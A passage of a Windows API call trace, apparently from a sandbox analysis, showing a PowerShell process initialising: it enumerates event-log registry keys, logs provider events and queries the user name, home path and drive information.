lpcchName=0x25e3b4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0141.741] RegEnumKeyExW (in: hKey=0x3c0, dwIndex=0x1, lpName=0x2e48d0, lpcchName=0x25e3b4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x25e3b4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0141.741] RegEnumKeyExW (in: hKey=0x3c0, dwIndex=0x2, lpName=0x2e48d0, lpcchName=0x25e3b4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x25e3b4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0141.741] RegEnumKeyExW (in: hKey=0x3c0, dwIndex=0x3, lpName=0x2e48d0, lpcchName=0x25e3b4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x25e3b4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0141.741] RegEnumKeyExW (in: hKey=0x3c0, dwIndex=0x4, lpName=0x2e48d0, lpcchName=0x25e3b4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x25e3b4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0141.741] RegEnumKeyExW (in: hKey=0x3c0, dwIndex=0x5, lpName=0x2e48d0, lpcchName=0x25e3b4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x25e3b4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0141.741] RegEnumKeyExW (in: hKey=0x3c0, dwIndex=0x6, lpName=0x2e48d0, lpcchName=0x25e3b4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x25e3b4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0141.742] RegEnumKeyExW (in: hKey=0x3c0, dwIndex=0x7, lpName=0x2e48d0, lpcchName=0x25e3b4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x25e3b4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0141.742] RegEnumKeyExW (in: hKey=0x3c0, dwIndex=0x8, lpName=0x2e48d0, lpcchName=0x25e3b4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x25e3b4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0141.742] RegOpenKeyExW (in: hKey=0x3c0, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e360 | out: phkResult=0x25e360*=0x3a0) returned 0x0 [0141.742] RegOpenKeyExW (in: hKey=0x3a0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e360 | out: phkResult=0x25e360*=0x0) returned 0x2 [0141.742] RegOpenKeyExW (in: hKey=0x3c0, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e360 | out: phkResult=0x25e360*=0x3c4) returned 0x0 [0141.742] RegOpenKeyExW (in: hKey=0x3c4, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e360 | out: phkResult=0x25e360*=0x0) returned 0x2 [0141.742] RegOpenKeyExW (in: hKey=0x3c0, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e360 | out: phkResult=0x25e360*=0x3c8) returned 0x0 [0141.743] RegOpenKeyExW (in: hKey=0x3c8, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e360 | out: phkResult=0x25e360*=0x0) returned 0x2 [0141.743] RegOpenKeyExW (in: hKey=0x3c0, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e360 | out: phkResult=0x25e360*=0x3cc) returned 0x0 [0141.743] RegOpenKeyExW (in: hKey=0x3cc, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e360 | out: phkResult=0x25e360*=0x0) returned 0x2 [0141.743] RegOpenKeyExW (in: hKey=0x3c0, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e360 | out: phkResult=0x25e360*=0x3d0) returned 0x0 [0141.743] RegOpenKeyExW (in: hKey=0x3d0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e360 | out: phkResult=0x25e360*=0x0) returned 0x2 [0141.744] RegOpenKeyExW (in: hKey=0x3c0, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e360 | out: phkResult=0x25e360*=0x3d4) returned 0x0 [0141.744] RegOpenKeyExW (in: hKey=0x3d4, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e360 | out: phkResult=0x25e360*=0x0) returned 0x2 [0141.744] RegOpenKeyExW (in: hKey=0x3c0, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e360 | out: phkResult=0x25e360*=0x3d8) returned 0x0 [0141.744] RegOpenKeyExW (in: hKey=0x3d8, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e360 | out: phkResult=0x25e360*=0x0) returned 0x2 [0141.744] RegOpenKeyExW (in: hKey=0x3c0, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e360 | out: phkResult=0x25e360*=0x3dc) returned 0x0 [0141.744] RegOpenKeyExW (in: hKey=0x3dc, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e360 | out: phkResult=0x25e360*=0x0) returned 0x2 [0141.744] RegOpenKeyExW (in: hKey=0x3c0, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e360 | out: phkResult=0x25e360*=0x3e0) returned 0x0 [0141.745] RegOpenKeyExW (in: hKey=0x3e0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e360 | out: phkResult=0x25e360*=0x3e4) returned 0x0 [0141.745] RegCloseKey (hKey=0x3e4) returned 0x0 [0141.745] RegCloseKey (hKey=0x3c0) returned 0x0 [0141.745] RegCloseKey (hKey=0x3e0) returned 0x0 [0141.750] RegisterEventSourceW (lpUNCServerName=".", lpSourceName="PowerShell") returned 0x4eb0004 [0141.753] GetLastError () returned 0x0 [0141.754] ReportEventW (hEventLog=0x4eb0004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x349dd64*="WSMan", lpRawData=0x349dc0c) returned 1 [0141.760] GetLastError () returned 0x0 [0141.761] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e48d0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0141.761] GetLastError () returned 0xcb [0141.761] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25ded4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.761] GetLastError () returned 0xcb [0141.761] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25de84, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.761] GetLastError () returned 0xcb [0141.761] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25de84, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.761] GetLastError () returned 0xcb [0141.761] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x315040, nSize=0x25e4d4 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x25e4d4) returned 0x1 [0141.762] GetLastError () returned 0xcb [0141.762] GetUserNameW (in: lpBuffer=0x2e48d0, pcbBuffer=0x25e4dc | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x25e4dc) returned 1 [0141.762] ReportEventW (hEventLog=0x4eb0004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x34a1c40*="Alias", lpRawData=0x34a1afc) returned 1 [0141.762] GetLastError () returned 0x0 [0141.763] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e48d0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0141.763] GetLastError () returned 0xcb [0141.764] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25ded4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.764] GetLastError () returned 0xcb [0141.764] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25de84, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.764] GetLastError () returned 0xcb [0141.764] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25de84, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.764] GetLastError () returned 0xcb [0141.764] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x315040, nSize=0x25e4d4 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x25e4d4) returned 0x1 [0141.765] GetLastError () returned 0xcb [0141.765] GetUserNameW (in: lpBuffer=0x2e48d0, pcbBuffer=0x25e4dc | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x25e4dc) returned 1 [0141.765] ReportEventW (hEventLog=0x4eb0004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x34a5bd4*="Environment", lpRawData=0x34a5a90) returned 1 [0141.765] GetLastError () returned 0x0 [0141.766] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e48d0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0141.766] GetLastError () returned 0xcb [0141.767] GetEnvironmentVariableW (in: lpName="HOMEDRIVE", lpBuffer=0x2e48d0, nSize=0x80 | out: lpBuffer="C:") returned 0x2 [0141.767] GetLastError () returned 0xcb [0141.767] GetEnvironmentVariableW (in: lpName="HOMEPATH", lpBuffer=0x2e48d0, nSize=0x80 | out: lpBuffer="\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1b [0141.767] GetLastError () returned 0xcb [0141.767] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", nBufferLength=0x105, lpBuffer=0x25e004, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFilePart=0x0) returned 0x1d [0141.767] GetLastError () returned 0xcb [0141.767] SetErrorMode (uMode=0x1) returned 0x1 [0141.767] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz"), fInfoLevelId=0x0, lpFileInformation=0x25e484 | out: lpFileInformation=0x25e484*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0141.767] GetLastError () returned 0xcb [0141.768] SetErrorMode (uMode=0x1) returned 0x1 [0141.829] GetLogicalDrives () returned 0x4 [0141.829] GetLastError () returned 0xcb [0141.830] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x25df28, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0141.830] GetLastError () returned 0xcb [0141.831] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0141.831] GetLastError () returned 0xcb [0141.831] SetErrorMode (uMode=0x1) returned 0x1 [0141.832] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2e49d0, nVolumeNameSize=0x32, lpVolumeSerialNumber=0x25e450, lpMaximumComponentLength=0x25e44c, lpFileSystemFlags=0x25e448, lpFileSystemNameBuffer=0x2e48d0, nFileSystemNameSize=0x32 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x25e450*=0x9c354b42, lpMaximumComponentLength=0x25e44c*=0xff, lpFileSystemFlags=0x25e448*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0141.833] GetLastError () returned 0xcb [0141.833] SetErrorMode (uMode=0x1) returned 0x1 [0141.833] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0141.833] GetLastError () returned 0xcb [0141.833] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x25dfb0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0141.833] GetLastError () returned 0xcb [0141.833] SetErrorMode (uMode=0x1) returned 0x1 [0141.833] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x34a6e0c | out: lpFileInformation=0x34a6e0c*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0141.833] GetLastError () returned 0xcb [0141.833] SetErrorMode (uMode=0x1) returned 0x1 [0141.833] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x25dfb0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0141.833] GetLastError () returned 0xcb [0141.833] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x25df3c, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0141.833] GetLastError () returned 0xcb [0141.833] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0141.833] GetLastError () returned 0xcb [0141.835] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x25def8, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0141.835] GetLastError () returned 0xcb [0141.835] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0141.835] GetLastError () returned 0xcb [0141.835] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x25df00, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0141.835] GetLastError () returned 0xcb [0141.835] SetErrorMode (uMode=0x1) returned 0x1 [0141.836] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x34a7a64 | out: lpFileInformation=0x34a7a64*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0141.836] GetLastError () returned 0xcb [0141.836] SetErrorMode (uMode=0x1) returned 0x1 [0141.836] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x25df08, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0141.836] GetLastError () returned 0xcb [0141.836] SetErrorMode (uMode=0x1) returned 0x1 [0141.836] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x34a7bb4 | out: lpFileInformation=0x34a7bb4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0141.836] GetLastError () returned 0xcb [0141.836] SetErrorMode (uMode=0x1) returned 0x1 [0141.836] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x25df4c, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0141.836] GetLastError () returned 0xcb [0141.836] SetErrorMode (uMode=0x1) returned 0x1 [0141.836] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x34a7d54 | out: lpFileInformation=0x34a7d54*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0141.836] GetLastError () returned 0xcb [0141.836] SetErrorMode (uMode=0x1) returned 0x1 [0141.836] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x315040, nSize=0x25e4d4 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x25e4d4) returned 0x1 [0141.837] GetLastError () returned 0xcb [0141.837] GetUserNameW (in: lpBuffer=0x2e48d0, pcbBuffer=0x25e4dc | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x25e4dc) returned 1 [0141.837] ReportEventW (hEventLog=0x4eb0004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x34aaadc*="FileSystem", lpRawData=0x34aa998) returned 1 [0141.837] GetLastError () returned 0x0 [0141.838] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e48d0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0141.838] GetLastError () returned 0xcb [0141.839] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25def0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.839] GetLastError () returned 0xcb [0141.839] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dea0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.839] GetLastError () returned 0xcb [0141.839] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dea0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.839] GetLastError () returned 0xcb [0141.839] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x315040, nSize=0x25e4d4 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x25e4d4) returned 0x1 [0141.839] GetLastError () returned 0xcb [0141.839] GetUserNameW (in: lpBuffer=0x2e48d0, pcbBuffer=0x25e4dc | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x25e4dc) returned 1 [0141.840] ReportEventW (hEventLog=0x4eb0004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x34aebcc*="Function", lpRawData=0x34aea88) returned 1 [0141.840] GetLastError () returned 0x0 [0141.843] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e48d0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0141.843] GetLastError () returned 0xcb [0141.847] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dee8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.847] GetLastError () returned 0xcb [0141.847] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25de98, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.847] GetLastError () returned 0xcb [0141.847] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25de98, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.847] GetLastError () returned 0xcb [0141.847] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25de98, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.847] GetLastError () returned 0xcb [0141.878] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dee8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.878] GetLastError () returned 0xcb [0141.878] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25de98, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.878] GetLastError () returned 0xcb [0141.878] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25de98, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.878] GetLastError () returned 0xcb [0141.880] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x315040, nSize=0x25e4d4 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x25e4d4) returned 0x1 [0141.880] GetLastError () returned 0xcb [0141.880] GetUserNameW (in: lpBuffer=0x2e48d0, pcbBuffer=0x25e4dc | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x25e4dc) returned 1 [0141.881] ReportEventW (hEventLog=0x4eb0004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x34c7c88*="Registry", lpRawData=0x34c7b44) returned 1 [0141.881] GetLastError () returned 0x0 [0141.881] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25ded4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.881] GetLastError () returned 0x0 [0141.882] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25de84, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.882] GetLastError () returned 0x0 [0141.882] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25de84, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.882] GetLastError () returned 0x0 [0141.882] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x315040, nSize=0x25e4d4 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x25e4d4) returned 0x1 [0141.883] GetLastError () returned 0x0 [0141.883] GetUserNameW (in: lpBuffer=0x2e48d0, pcbBuffer=0x25e4dc | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x25e4dc) returned 1 [0141.883] ReportEventW (hEventLog=0x4eb0004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x34cba70*="Variable", lpRawData=0x34cb92c) returned 1 [0141.883] GetLastError () returned 0x0 [0141.884] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e48d0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0141.884] GetLastError () returned 0xcb [0141.886] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e48d0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0141.886] GetLastError () returned 0xcb [0141.888] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x25ded4, 